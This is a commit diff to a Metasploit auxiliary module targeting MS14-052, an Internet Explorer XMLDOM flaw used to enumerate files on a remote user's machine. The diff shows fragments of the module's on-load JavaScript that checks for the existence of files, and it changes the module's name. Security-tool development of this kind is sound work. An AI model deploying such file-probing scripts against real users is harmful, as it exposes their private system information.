Skip to content

Commit 560f31c

Browse files
committed
Minor changes
1 parent 68624dd commit 560f31c

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

modules/auxiliary/gather/ie_files_disclosure.rb

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Auxiliary
1111

1212
def initialize(info={})
1313
super(update_info(info,
14-
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Information Disclosure",
14+
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
1515
'Description' => %q{
1616
This module will use the Microsoft XMLDOM object to enumerate a remote user's filenames.
1717
To use it, you must supply your own list of file paths. Each file's format should look like this:
@@ -52,7 +52,6 @@ def js
5252
var foundFileString = "";
5353
5454
window.onload = function() {
55-
//var files = ['c:\\\\windows\\\\system32\\\\calc.exe'];
5655
var files = [#{js_target_files}];
5756
var foundFiles = ie_addons_detect.checkFiles(files);
5857
for (var file in foundFiles) {

0 commit comments

Comments
 (0)